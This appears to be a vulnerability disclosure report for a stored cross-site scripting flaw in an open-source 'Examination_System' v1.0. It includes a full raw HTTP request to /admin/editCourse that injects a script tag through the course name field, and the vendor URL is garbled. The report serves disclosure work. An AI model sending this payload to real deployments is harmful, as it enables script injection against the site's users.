There is a cross site scripting vulnerability exists in Examination_System

[afeng2016-s]

[Suggested description]
Cross SIte Scripting (XSS) vulnerability exists in Examination_System.As of March 14, 2022, there was a cross site scripting vulnerability in the master branch.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/JaceyRx/Examination_System

[Affected Product Code Base]
v1.0

[Affected Component]

POST /admin/editCourse HTTP/1.1
Host: localhost:7000
Content-Length: 265
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:7000/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:7000/admin/editCourse?id=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=D01E67ABDC192BABF6A2179D70244246
Connection: close

courseid=1&coursename=C%E8%AF%AD%E8%A8%80%E7%A8%8B%E5%BA%8F%E8%AE%BE%E8%AE%A1%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&teacherid=1001&coursetime=%E5%91%A8%E4%BA%8C&classroom=%E7%A7%91401&courseweek=18&coursetype=%E5%BF%85%E4%BF%AE%E8%AF%BE&collegeid=1&score=3

[Attack Type]
Remote

[Impact Code execution]
true

[Vulnerability proof]